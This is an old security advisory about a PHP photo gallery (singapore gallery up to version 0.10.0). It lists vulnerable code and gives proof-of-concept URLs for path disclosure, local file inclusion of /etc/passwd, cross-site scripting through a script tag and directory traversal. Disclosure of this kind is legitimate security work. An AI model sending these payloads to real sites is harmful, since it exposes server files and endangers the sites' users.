singapore gallery <= 0.10.0 Multiple Vulnerabilities

2006-06-27 / 2006-06-28
Credit: simo64 gmail com
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-3196 | CVE-2006-3195 | CVE-2006-3194
CWE: N/A

Produce : singapore gallery Versions : 0.10.0 and prior Site : http://www.sgal.org/ Discovred By : Moroccan Security Research Team (Simo64) Greetz : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid .:r00tkita - s4mi - Silitix - tahati - And All Friends :) [-] Vulnerable code near lignes 16-35 <? 16 . require_once "includes/singapore.class.php"; 19 . $sg = new Singapore(); 35 . include $sg->config->base_path.$sg->config->pathto_current_template."index.tpl.p hp"; ?> [+] Full Path Disclosure : ************************** Exemple: http://localhost/singapore/index.php?template=simo64 Result : Warning: main(templates/simo64/index.tpl.php): failed to open stream: No such file or directory in /home/sing/public_html/livedemo/index.php on line 35 [+] Local File Inclusion : *************************** Proof Of Concept : http://localhost/singapore/index.php?template=./../../../../etc/passwd%0 0 [+] Cross Site Scripting : ************************** http://localhost/singapore/index.php?template=<script>alert('Moroccan Security Team');</script> [+] Directory Traversal : ************************** Proof Of Concept : http://localhost/singapore/index.php?gallery=./../../../


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top